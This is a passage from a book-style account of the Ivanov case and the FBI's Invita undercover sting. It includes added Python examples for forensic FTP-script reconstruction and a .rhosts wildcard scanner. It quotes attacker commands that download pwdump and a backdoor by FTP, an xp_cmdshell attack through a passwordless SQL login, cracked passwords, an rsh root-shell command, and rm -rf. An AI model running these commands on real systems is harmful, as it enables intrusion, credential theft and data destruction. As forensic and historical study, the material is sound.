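    r"echo get serv.exe >> c:\winnt\ftp_comm",
    r"echo get pwdump.exe >> c:\winnt\ftp_comm",
    r"echo get lomscan.exe >> c:\winnt\ftp_comm",
    r"echo get 26405.exe >> c:\winnt\ftp_comm",
    r"echo quit >> c:\winnt\ftp_comm",
    r"ftp -n -s:c:\winnt\ftp_comm",
    r"ren 26405.exe ntalert.exe",
]

ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*(?P<op>>>|>)\s*(?P<file>\S+)\s*$", re.I)
FTP_RE = re.compile(r"^ftp\b.*?-s:(?P<file>\S+)", re.I)
REN_RE = re.compile(r"^(?:ren|rename)\s+(?P<old>\S+)\s+(?P<new>\S+)\s*$", re.I)


def rebuild_files(commands):
    """Replay echo redirections: '>' truncates, '>>' appends.  Returns {path: contents}."""
    files = defaultdict(list)
    for cmd in commands:
        m = ECHO_RE.match(cmd.strip())
        if not m:
            continue
        path = m["file"].lower()          # Windows paths are case-insensitive
        if m["op"] == ">":
            files[path] = []
        files[path].append(m["text"])
    return {path: "\n".join(lines) for path, lines in files.items()}


def summarize_ftp_script(script):
    """Pull host, credentials, working directory and transfers out of an ftp -s command file."""
    summary = {"host": None, "account": None, "password": None,
               "directory": None, "downloads": [], "uploads": []}
    for line in script.splitlines():
        parts = line.split()
        if not parts:
            continue
        verb, args = parts[0].lower(), parts[1:]
        if verb == "open" and args:
            summary["host"] = args[0]
        elif verb == "user" and args:
            summary["account"] = args[0]
            summary["password"] = args[1] if len(args) > 1 else None
        elif verb == "cd" and args:
            summary["directory"] = args[0]
        elif verb in ("get", "mget", "recv"):
            summary["downloads"].extend(args)
        elif verb in ("put", "mput", "send"):
            summary["uploads"].extend(args)
    return summary


def analyze(commands):
    """Tie each 'ftp -s:<file>' invocation to the file the echoes built, and collect renames."""
    files = rebuild_files(commands)
    transfers = []
    renames = {}
    for cmd in commands:
        cmd = cmd.strip()
        m = FTP_RE.match(cmd)
        if m and m["file"].lower() in files:
            transfers.append(summarize_ftp_script(files[m["file"].lower()]))
            continue
        m = REN_RE.match(cmd)
        if m:
            renames[m["old"]] = m["new"]
    return {"transfers": transfers, "renames": renames}


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_COMMANDS), indent=2))
```

Replaying the redirections, rather than grepping for tool names, is what makes this robust: it recovers the remote host and the credential (which, as the book notes, was reused on tech.net.ru) even when the tools are renamed on arrival, and the rename table tells the responder which file on disk is actually the backdoor.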

Alexey Demonstrates His Skill

Preparatory to installing the sniffer on enterprise, the intruder entered an “ipconfig -all” command, which gave him the IP address and network configuration of that system. He then launched the sniffer program smmsniff.exe and directed its output to a new file called log. The sniffer let the intruder capture traffic on the network segment, including user IDs and passwords that protocols such as telnet and FTP send in clear text.[42]

On October 23, 2000, the intruder used FTP from tech.net.ru to connect to the computer named discovery. He logged on as root with a password of invita4500. This was information that the intruder had not had before and, since no one had logged on to that account, the sniffer could not have captured that password. Therefore, the intruder must have used a tool like L0phtCrack[43] to crack the password hashes he had obtained with pwdump. A hash cannot be decrypted; a cracker recovers the password by hashing guesses until one produces the same value. The Administrator password on enterprise, Invita 4500 (see Alexey’s list below), is a near twin of the root password on discovery, so once the first had been cracked the second was a short step.[44]

Finally, the intruder successfully connected to a third Invita computer, atlantis. He did so by the simple but common expedient of trying the same username and password that had worked on discovery. Because Sytex wanted to create a typical corporate network, this common weakness, the reuse of one password across machines, was deliberately built in.[45]

The intruder used a number of tools, such as SuperScan, that are readily available for download on the Internet. Many were relatively simple to use, and some have legitimate uses for system administrators. Likewise, his knowledge of Unix did not seem extensive. Nevertheless, the intruder did not do several things that are the hallmark of novice hackers. He did not, for example, use an automated rootkit, and he did not add easily identified accounts. In addition, he did not delete any system files. He also ran Perl scripts that required some sophistication to write. In sum, Curtis Rose concluded that the hacker’s skill set put him well above the level of a script kiddie, and that the tool suite and techniques used represented a significant threat to e-commerce sites.[46]

On October 24, 2000, Alexey sent the following message to mpatterson:

“Hello

You system is hacked

I will send information about it to you later”[47]

Several days later, on October 27, 2000, Alexey explained some of the vulnerabilities that he had found:

“Few days ago Im check security on network that you give to me before And here is list of security checks

Im use hole on box with IP 12.46.224.162, and this hole in Microsoft SQL It is possible to login with user 'sa' without password and execute commands on remote computer i use SQL instruction xp_cmdshell 'command'; for execute commands. After this i grab passwords from NT and decrypt it. Here is list of users with decrypted passwords:

User: Administrator Password: Invita 4500

User: mpatterson Password: !pace448

User: SQLAgentCmdExec Password: QESVMGAR

After this i setup backdoor and sniffer on NT box. After this i use login 'root' and password 'invita4500' for log in to another computers via FTP and computers with IP 12.46.224.163 and 12.46.224.164 allow me to do this

I upload file .rhosts constain '+ +' to root folder on these computer and login via rsh (514 port) with command: rsh -l root <IP> /bin/csh -i

Thats all

P.S.

If you have any questions to me please email me asap

And please tell me you thinks

Best regards”[48]
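The last step in Alexey’s report, a .rhosts file containing “+ +”, is the classic Unix trust hole: with it in place, any user from any host may rsh in as that account without a password, which is exactly what his rsh -l root command did. Checking for it is cheap. The following Python is an added example, not the book’s or Sytex’s code: it walks a directory tree for .rhosts and hosts.equiv files, parses each entry the way the r-commands do, and reports any whose host or user field is the “+” wildcard. demo() builds a constructed tree in a temporary directory (the account names and host in it are assumptions) and runs the scan over it.

```python
import os
import tempfile

TRUST_FILES = {".rhosts", "hosts.equiv"}   # per-user and system-wide rsh/rlogin trust


def parse_rhosts_line(line):
    """Return (host, user) for one trust entry, or None for blank/comment lines.
    A missing user field means 'the same username as on the remote host'."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return None
    parts = line.split()
    return parts[0], (parts[1] if len(parts) > 1 else None)


def is_wildcard(entry):
    """'+' in the host field trusts every host; '+' in the user field trusts every user."""
    host, user = entry
    return host == "+" or user == "+"


def find_wildcard_trust(root):
    """Walk root and return (relative path, line number, line) for every wildcard trust entry."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in TRUST_FILES:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors="replace") as fh:
                    for lineno, raw in enumerate(fh, 1):
                        entry = parse_rhosts_line(raw)
                        if entry is not None and is_wildcard(entry):
                            hits.append((os.path.relpath(path, root), lineno, raw.rstrip("\n")))
            except OSError:
                continue   # unreadable file: skipped here, a real audit would log it
    return sorted(hits)


def demo():
    """Constructed tree: one wide-open .rhosts, one sane one, one wide-open hosts.equiv."""
    with tempfile.TemporaryDirectory() as base:
        samples = {
            "home/alice/.rhosts": "+ +\n",                                   # anyone, from anywhere
            "home/bob/.rhosts": "# ok: one host, one user\nbuild.example.com bob\n",
            "etc/hosts.equiv": "# system-wide trust\n+\n",                  # every host, same username
        }
        for rel, content in samples.items():
            full = os.path.join(base, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(content)
        return find_wildcard_trust(base)


if __name__ == "__main__":
    for path, lineno, line in demo():
        print(f"{path}:{lineno}: {line!r}")
```

Point find_wildcard_trust at / on a real host and it finds the same thing Alexey planted. A bare “+” in hosts.equiv is flagged too, because it trusts every host for every non-root user. The durable fix, then as now, is not to police these files but to disable rsh and rlogin entirely.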

Meanwhile, arrangements to have U.S. Visas issued to Ivanov and Gorshkov were moving ahead. On October 30, 2000, Alexey emailed Michael Patterson that he had “good news.” “[M]e and my business partner got Visa today.”[49] They planned to arrive in Seattle on November 10 shortly after noon.

As the lure moved toward culmination, the prosecutors and FBI agents gleefully contemplated the likelihood that two international criminals would soon be in their grasp. Would they really come? Undercover operations, designed to catch criminals in the act of committing crimes, often go awry. Sophisticated subjects can be wary and use the undercover meetings to generate false exculpatory statements. Or, they can simply get cold feet and not show up. These guys, however, seemed determined, even eager, to come to Seattle. Would greed and ambition induce the young Russian hackers to take the lure?



[1] These facts are taken from the Affidavit of Special Agent Kenneth E. Gray filed in the District of Connecticut in connection with the seeking of an Order authorizing the disclosure of electronic communications records pertaining to the email address and account held under the name Alexey V. Ivanov, which address and account is maintained by CTS Network Services (CTS), 8913-C Complex Drive, San Diego, California 92123-1413.

[2] This is the same Unix command that Alexey threatened Speakeasy with and then, when Mike Apgar refused to pay him, actually ran on one of the Speakeasy servers. The command rm (remove) deletes files. The option -r (recursive) removes the entire directory and all of its contents, whereas -f (force) also removes write-protected files, including system operating software, without a prompt. Thus, running this command destroys all data on the target server.

[3] Affidavit of Special Agent Kenneth Gray, filed in the District of Connecticut, October, 2000 in connection with an application for an Order authorizing the disclosure of email associated with the address .

[4] Raymond Bero’s testimony begins at RT, 1448.

[5] RT, 1449-1453.

[6] RT, 1456.

[7] RT, 1453.

[8] Government’s Exhibits 1001-1005.

[9] RT, 1457.

[10] RT, 1458; Government’s Exhibit 1017.

[11] RT, 1456-1457.

[12] RT, 1459-1466.

[13] Affidavit of Special Agent Kenneth Gray, filed in the District of Connecticut, October, 2000 in connection with an application for an Order authorizing the disclosure of email associated with the address .

[14] See Ivanov’s charging document in the District of New Jersey at http://www.justice.gov/criminal/cybercrime/ivanovInfo_NJ.htm.

[16] RT, 240-241.

[17] Government’s Exhibit 2.

[18] Government’s Exhibit 2A.

[19] RT, 246 and Government’s Exhibit 2B.

[20] See, for example, the testimony of Special Agent Mike Schuler at RT, 496, where he testified that up until the receipt of this email, the FBI had never heard of Vasily Gorshkov.

[21] I have deliberately set forth the Material Witness Warrant provisions at some length. After the tragic events of 9-11, the media contained much discussion of Material Witness Warrants and their alleged abuse by the Government. Some of the coverage seemed to imply that the practice of arresting people who were not to be charged was abnormal, even unconstitutional. As the reader can see, however, the statutes and rules covering Material Witness Warrants retain the historical powers of an impartial judiciary to balance the Government’s need for the testimony of a witness, with that witness’s right to be at liberty in the absence of criminal charges. Hence, the statutory scheme provides for the temporary detention of witnesses for a reasonable time, and only until her testimony can be preserved in a usable form.

[22] Government’s Exhibit 2C.

[23] Government’s Exhibit 2E, consisting of three emails from Ivanov.

[24] RT, 252.

[25] 18 U.S.C. § 2511(2)(c).

[26] U.S. Const. Art. VI.

[27] The telephone conversation was introduced as a tape recording (Government’s Exhibit 3) that was played for the jury. In addition, a transcription of that recording (Exhibit 3A) was used by the jurors to aid in their listening.

[28] The transcript of the telephone call reads “to.” It probably should read “so.”

[29] Government’s Exhibit 2T.

[30] Government’s Exhibit 2F.

[31] Curtis Rose’s testimony begins at RT, 292.

[32] Government’s Exhibit 2U.

[33] Government’s Exhibit 17.

[34] RT, 307-308.

[35] RT, 312.

[36] RT, 313-314.

[37] Government’s Exhibit 17, slides 18 and 19; RT, 307-308.

[38] RT, 315.

[39] Microsoft Data Access Components (commonly abbreviated MDAC) is a framework of interrelated Microsoft technologies that allows programmers a uniform and comprehensive way of developing applications that can access almost any data store. Its components include ActiveX Data Objects (ADO), OLE DB, and Open Database Connectivity (ODBC). The first version of MDAC was released in August 1996. At that time, Microsoft stated that MDAC was more a concept than a stand-alone program and had no widespread distribution method. Later, Microsoft released upgrades to MDAC as web-based redistributable packages. Eventually, later versions were integrated with Microsoft Windows and Internet Explorer.

Throughout its history, MDAC has been the subject of several security flaws, which led to attacks such as an escalated privileges attack, although the vulnerabilities were generally fixed in later versions and fairly promptly. The current version is 2.8 service pack 1, but the product has had many versions and many of its components have been deprecated and replaced by newer Microsoft technologies. MDAC is now known as Windows DAC in Windows Vista.

[40] RT, 316-319.

[41] RT, 319-322.

[43] L0phtCrack is a password auditing and cracking program that recovers Windows passwords from the hashes in which Windows stores them. A password hash cannot be reversed, so L0phtCrack works by guessing: a dictionary attack hashes ordinary words, and simple variations on them, and looks for a match against the captured hashes; a brute-force attack, which is far more time-consuming, tries every possible combination of characters until one hashes to the same value. Obviously, simple passwords consisting of common words are broken first. The older LM hash that Windows NT kept alongside the NT hash made the job easier still, because it converts the password to upper case and hashes it in two seven-character halves, each of which can be attacked separately. The program was developed by “Mudge” at L0pht Heavy Industries, a self-styled hacker think-tank that was formed in Boston in late 1991. For a brief history of L0pht Heavy Industries, see Bruce Gottlieb, “HacK, CouNterHaCk,” The New York Times Magazine, October 3, 1999.

[44] RT, 329.

[45] RT, 332.

[46] RT, 333-336; the tools are listed in Government’s Exhibit 17, slide 63.

[47] Government’s Exhibit 2V.

[48] Government’s Exhibit 2W.

[49] Government’s Exhibit 2X.
